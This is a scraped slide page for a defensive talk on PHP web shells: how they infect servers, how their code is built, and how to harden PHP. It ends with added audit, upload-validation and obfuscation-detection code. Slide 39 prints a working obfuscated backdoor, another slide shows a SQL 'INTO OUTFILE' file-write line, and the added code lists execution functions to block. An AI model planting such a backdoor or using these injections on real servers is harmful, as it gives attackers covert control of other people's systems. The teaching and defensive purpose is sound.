Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
 

Recently uploaded

Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Tomaz Bratanic
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Malak Abu Hammad
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
Mariano Tinti
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
Edge AI and Vision Alliance
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
Uni Systems S.M.S.A.
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
Claudio Di Ciccio
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
Octavian Nadolu
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
Neo4j
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
名前 です男
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
Adtran
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
kumardaparthi1024
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
KAMESHS29
 

Recently uploaded (20)

Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
 

Anatomy of PHP Shells

  • 1. Vedran Krivokuća, <vedran.krivokuca@nimium.hr> Ivan Špoljarić, <ivan.spoljaric@nimium.hr> Anatomy of PHP shell scripts
  • 2. A little about PHP shells in general
  • 3. ● Scripts written (mostly) in PHP*; ● Placed on a server (mostly under existing PHP sites) without authorization from server/web site owner; ● Used for "unauthorized maintenance" of the infected server; ● By the "unauthorized maintenance", we mean literally anything. What are PHP shell scripts?
  • 4. ● Running applications/scripts (with root privileges) ● "Piggybacking" on existing local exploits ● Modifying files ● Changing user passwords ● Enabling/disabling/reconfiguring system services ● Dumping, destroying and modifying databases ● Opening new backdoors to the system "Unauthorized maintenance"
  • 5. ● Surprisingly, yes: C99shell and all of its derivatives seem to be the most widespread PHP shells out there. ● There are literally thousands of PHP shell scripts out there; quality varies. Are there "the best" PHP shells?
  • 6. Methods of infection by PHP shells
  • 7. ● Documentation for PHP, not the language itself, is a root of all evil. ● You don't believe it? This is how bad it is: Root Of All Evil
  • 8.
  • 9. How hard could this possibly be?
  • 10. ● But most of the responsibility is on the programmer. ● The PHP team often does a good job describing possible security pitfalls in their documentation. Documented possible pitfalls
  • 11. ● attacks through standard filesystem functions which allow socket operations, like fopen(), include(), require()...* ● attacks through unvalidated upload forms (not documented clearly enough, obviously...) ● in the worst-case scenario, due to a constellation of multiple bugs/vulnerabilities/weak setup, an attacker might even use SQL injection to write files on your server!
      mysql> SELECT `injected_malicious_data`
             FROM `yourtable`
             INTO OUTFILE "file.php"
    Documented possible vulnerabilities
  • 12. ● Legend says there were infections with shell scripts through stolen FTP credentials. So, it's about time you changed your "god", "sex" and "love" stuff. Also, change those "password" and "password123". In other words, your server's security is only as strong as its weakest link. ● On shared hosting environments without proper user account isolation, it might not even be you who is infected but another shared hosting client. Consult hosting support in order to track down how you were attacked. Other methods of infection
  • 14. And now the interesting part... Let's take a peek at PHP shells code
  • 15. ● Rather clever, if not smart, architecture ● Written mostly in PHP, but can bring any exploiting code inside PHP source code in binary (compiled) form (mostly base64 encoded within variables) or even download needed exploits (source or binary) from 3rd party sites, compile and/or run them. ● If needed, can pull its own components from 3rd party sites. General architecture
  • 16. ● Decentralized development ● Resulting in many variations of all PHP shells in the wild ● Code often complies with such a development process, usually securing itself against redefinition of crucial components (if (!function_exists(...)) ... prior to all important definitions) ● Can rely on 0-day exploits! Quick development cycle
  • 17. ● The scary part: it's a really short way from "plain PHP shell" to a full-blown bot script controlled through IRC Quick development cycle
  • 18. ● Not written by your know-just-a-little-coding regular PHP dev (no pun intended) ● You'll see what I mean... Coding style
  • 19. ● Well documented code:
      function mysql_query_parse($query, $output_type) {
        /* if output_type == 0, no output,
           if output_type == 1, no output if no error
           if output_type == 2, output without control-buttons
           if output_type == 3, output with control-buttons */
        ...
      }
    Coding style
  • 20. ● Proper understanding and usage of variable scopes:
      function c99fsearch($d) {
        global $found;
        global $found_d;
        global $found_f;
        global $search_i_f;
        global $search_i_d;
        global $a;
        ...
      }
    Coding style
  • 21. ● It's usually safer code than much of the production PHP code in the wild: ● If it's a cross-platform shell, it performs checks before calling a function unavailable on other platform(s) ● Variables included in HTML output are escaped, so no easy path to unwanted XSS ● SQL query parameters are also escaped, so no easy path to unwanted SQL injections Coding style
  • 22. ● Variable/function name obfuscation is done/not done in approximately 50:50 of the PHP shells we collected ● External URLs, usernames and passwords are almost always encoded using either base64 encoding or some kind of ASCII-code-to-hex-codes conversion ● Obviously not for real protection, but as obfuscation against the most obvious pattern searching during detection attempts* Coding style
  • 23. GUI
  • 24. ● Mostly quite ugly but always very efficient ● Sortable table outputs on every field ● You might be tempted to administer your server solely through PHP shell scripts. :-) GUI
  • 26. There are no shortcuts!
  • 27. These recommendations are best for hosters, but developers are also invited to keep them in mind! ● Whenever possible, chroot or go even further with isolation of different web sites on the same machine (containers/pseudo-virtualization/virtualization), limiting potential damage to just one site. ● Regularly update your server's OS – PHP shells (as we've learned) can bring along local exploits. ● Seriously consider complex password policies if you're running a shared hosting environment. System preparation
  • 28. ● Disable potentially dangerous socket functionality of filesystem PHP functions if you don't need it (allow_url_fopen, allow_url_include in php.ini) if you're not sure – you don't need it ● When editing, keep in mind some systems (*cough*Debian*cough*) may have multiple php.ini files (one for mod_php, one for CLI, one for CGI...). Take care of them all. ● Follow usual security principles in server administration and maintenance. Global PHP configuration
  • 29. ● Consider further crippling PHP by disabling at least program execution PHP functions if you don't need them (through disable_functions). ● Which are those? http://www.php.net/manual/en/ref.exec.php ● Leave something enabled from program execution functions?* escapeshellarg(), escapeshellcmd() ● While on that subject – you can't disable eval() like this. :-) Global PHP configuration
  • 30. ● Always be checking uploaded files! (it is incredible how much code does not do any kind of checks) ● Keep in mind not to rely on $_FILES[…]['type']. Why? Follow good coding practices
  • 32. ● In general, checking the file extension could serve you well... Don't stop there, but use it as the primary defense measure. ● That might just not be enough sometimes. You might want to step up this game: ● check the MIME type on the server. On Linux, you can use the external FILE(1) utility, assuming you haven't disabled program execution functions. ● We'll see how others do it later. Ok, how to check uploaded files?
  • 33. ● Always be sanitizing and validating inputs. PHP shells can be injected through various vectors: ● Apply programming techniques to eliminate possible SQL injections (escaping, parametrization...) ● Always be escaping the shell commands you execute and their arguments. ● Always double-check the filenames (and their paths!) of files you handle from the code! Follow good coding practices
  • 34. How do others defend themselves? (three examples)
  • 35. ● As far as file uploads go, WordPress checks uploaded media types by instancing them in the respective modules (i.e. it calls GD's getimagesize() on images) ● WordPress is a generally very safe CMS. 3rd party plugins are usually the source of security issues and PHP shell infections. WordPress
  • 36. ● Puts no limitation itself on the uploaded content, since it is attached to e-mail messages and then deleted from temporary locations. ● Is it possible to attack remote e-mail clients like that? Depending on the destination client, it's possible. Not something Roundcube devs should and could focus on. Roundcube webmail
  • 37. ● Guesses the mime-type by extension, and you limit allowed mime-types for upload through configuration. ● You can enable upload of "dangerous file types" if you want. Dokuwiki
  • 38. Bonus slide What happens when frustrated Sendmail administrators write PHP shells? http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html
  • 39. @$_[]=@!+_; $__=@${_}>>$_; $_[]=$__; $_[]=@_; $_[((++$__)+($__++ ))].=$_; $_[]=++$__; $_[]=$_[--$__][$__>>$__]; $_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__]; $_[$__+$__] = ($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] ); $_[$__+$__] .= ($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] ); $_[$__+$__] .= ($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ]; $_=$ $_[$__+ $__] ;$_[@-_]($_[@!+_]); #ep1cw1n
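Slides 28 and 29 recommend turning off allow_url_fopen/allow_url_include and adding the program execution functions to disable_functions, and warn that each SAPI may load its own php.ini. The following audit script is an added example, not part of the slides: it reports which php.ini is in effect for the SAPI it runs under and which of those settings are still open, so it can be run once from the CLI and once through the web server and the two reports compared.

```php
<?php
// Added example (not from the slides): audit the effective PHP configuration
// for the settings the slides recommend tightening. Run it once from the CLI
// and once through the web server, since each SAPI may load its own php.ini.
function audit_php_config(): array
{
    $findings = [];

    // Which php.ini is actually in effect for this SAPI?
    $findings[] = 'SAPI ' . PHP_SAPI . ' loaded php.ini: '
        . (php_ini_loaded_file() ?: '(none)');

    // Socket functionality of the filesystem functions (fopen()/include()
    // of URLs); both should be Off unless the application needs them.
    foreach (['allow_url_fopen', 'allow_url_include'] as $directive) {
        if (filter_var(ini_get($directive), FILTER_VALIDATE_BOOLEAN)) {
            $findings[] = "WARNING: $directive is On; set it to Off unless needed";
        }
    }

    // Program execution functions (php.net/manual/en/ref.exec.php) plus
    // popen(), which also spawns a process. escapeshellarg() and
    // escapeshellcmd() are deliberately left out: they only escape strings.
    $exec_functions = ['exec', 'passthru', 'proc_open', 'shell_exec',
                       'system', 'popen'];
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    foreach ($exec_functions as $fn) {
        if (function_exists($fn) && !in_array($fn, $disabled, true)) {
            $findings[] = "WARNING: $fn() is callable; add it to disable_functions";
        }
    }

    // eval() is a language construct, so disable_functions cannot remove it.
    $findings[] = 'NOTE: eval() cannot be disabled via disable_functions';

    return $findings;
}

foreach (audit_php_config() as $line) {
    echo $line, PHP_EOL;
}
```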
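Slide 30 says not to trust $_FILES[...]['type'], and slide 32 suggests an extension whitelist as the primary check with a server-side MIME type check on top. The function below is an added example, not code from the slides or from any of the projects mentioned: it applies exactly that order of checks, using PHP's finfo extension as the in-process equivalent of the FILE(1) utility (so it still works when program execution functions are disabled) and, for images, the getimagesize() parse the slides attribute to WordPress. The $allowed map and the uploads directory are assumptions for the demo.

```php
<?php
// Added example (not from the slides): validate an upload without trusting
// $_FILES[...]['type']. $allowed maps permitted extensions to the MIME type
// that server-side inspection must report for them.
function validate_upload(array $file, array $allowed): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return 'upload failed with error code ' . ($file['error'] ?? 'unknown');
    }
    // Only accept files that really came in through the upload mechanism.
    if (!is_uploaded_file($file['tmp_name'])) {
        return 'not an uploaded file';
    }
    // Primary defence: whitelist the extension of the client-supplied name.
    // The name itself is never used for the stored path (see usage below).
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return "extension '$ext' not allowed";
    }
    // Second line: inspect the content on the server. finfo is the in-process
    // counterpart of file(1); no program execution function is needed.
    $finfo    = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($file['tmp_name']);
    if ($detected !== $allowed[$ext]) {
        return "content type '$detected' does not match extension '$ext'";
    }
    // For images, let an image library actually parse the file.
    if (strncmp($detected, 'image/', 6) === 0 && @getimagesize($file['tmp_name']) === false) {
        return 'file claims to be an image but does not parse as one';
    }
    return null; // valid
}

// Usage: store under a server-chosen name, never the client-supplied one.
$allowed = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'pdf' => 'application/pdf'];
if (isset($_FILES['upload'])) {
    $problem = validate_upload($_FILES['upload'], $allowed);
    if ($problem !== null) {
        http_response_code(400);
        exit("Rejected: $problem");
    }
    $ext  = strtolower(pathinfo($_FILES['upload']['name'], PATHINFO_EXTENSION));
    $dest = __DIR__ . '/uploads/' . bin2hex(random_bytes(16)) . '.' . $ext;
    move_uploaded_file($_FILES['upload']['tmp_name'], $dest);
}
```

Keep the uploads directory outside the web root, or at least configured so PHP is not executed from it, so that a file which slips through the checks still cannot run.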
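Slide 22 observes that shells hide URLs and credentials as base64 or hex-escaped strings to defeat naive pattern searches. The detector below is an added example, not from the slides: it extracts such literals from PHP source, decodes them, and flags decoded values that look like URLs or execution function names, which is what a pattern search over the raw file would miss. The sample source it scans is constructed for the demo, and the heuristics are deliberately simple.

```php
<?php
// Added example (not from the slides): find base64 and "\xNN"-escaped string
// literals in PHP source, decode them, and flag suspicious decoded values.
function find_obfuscated_strings(string $source): array
{
    $hits = [];
    // Quoted base64-looking literals of at least 16 characters.
    if (preg_match_all('/[\'"]([A-Za-z0-9+\/]{16,}={0,2})[\'"]/', $source, $m)) {
        foreach ($m[1] as $lit) {
            $dec = base64_decode($lit, true);
            if ($dec !== false && ctype_print($dec)) {
                $hits[] = ['kind' => 'base64', 'literal' => $lit, 'decoded' => $dec];
            }
        }
    }
    // Double-quoted strings built entirely from \xNN escapes (4 or more).
    if (preg_match_all('/"((?:\\\\x[0-9A-Fa-f]{2}){4,})"/', $source, $m)) {
        foreach ($m[1] as $lit) {
            $dec = preg_replace_callback('/\\\\x([0-9A-Fa-f]{2})/',
                fn($h) => chr(hexdec($h[1])), $lit);
            $hits[] = ['kind' => 'hex', 'literal' => $lit, 'decoded' => $dec];
        }
    }
    // Flag decoded values that look like what shells hide: URLs, or the names
    // of execution/decoding functions that will later be called dynamically.
    foreach ($hits as &$h) {
        $h['suspicious'] = (bool) preg_match(
            '/https?:\/\/|ftp:\/\/|\b(eval|system|exec|passthru|shell_exec|base64_decode)\b/i',
            $h['decoded']);
    }
    unset($h);
    return $hits;
}

// Constructed sample resembling an obfuscated shell fragment (not real malware):
// a base64-encoded URL and a hex-escaped function name called dynamically.
$sample = '<?php $u = "aHR0cDovL2V4YW1wbGUuY29tL3BheWxvYWQudHh0"; '
        . '$f = "\x73\x79\x73\x74\x65\x6d"; $f(base64_decode($u));';
foreach (find_obfuscated_strings($sample) as $h) {
    printf("%-6s %-8s %s\n", $h['kind'], $h['suspicious'] ? 'SUSPECT' : 'ok', $h['decoded']);
}
```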